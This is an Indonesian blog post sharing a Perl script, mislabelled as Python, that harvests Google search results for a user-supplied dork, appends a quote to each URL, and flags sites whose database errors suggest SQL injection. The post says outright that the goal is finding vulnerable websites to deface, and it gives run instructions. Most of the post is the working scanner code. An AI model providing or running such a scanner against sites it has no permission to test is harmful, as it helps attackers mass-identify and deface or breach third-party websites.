Indonesian Blogger

Banner iskaruji dot com

Selasa, 04 Desember 2012

0 Scan SQL Vuln with Python

mungkin temen2 gak mau main tebak2an sama mbah google untuk mencari / membuka satu persatu web yg vuln buat di depes.
so copy script dibawah ini :


Quote:
Code:
#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. Home : https://www1.r00tw0rm.com/       .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||         ||
   || scanner ||   
   ||         ||   
   |'---------'|   
    `)__ ____('     
    [=== -- o ]--.
  __'---------'__ \     
[::::::::::: :::] )
`""'"""""'""""`/T\\
                \\_/

Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";

for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/href
=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
           
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
               
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
           
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
               
            }
        }
        }
        }
kemudian save dengan nama "sql-scan.py"

setelah itu jalankan di terminal kalian
ketik:

Code:
[color=red]@bt:#[/color] ./sql-scan.py -k [dork nya] -p [lalu enter]
nih sreenshot nya

[Image: Screenshot-5.png]


untuk dork silahkan dicari sendiri, sama embah kan ada banyak tu

0 komentar:

-::DESCRIPTION
-::DATE
Diberdayakan oleh Blogger.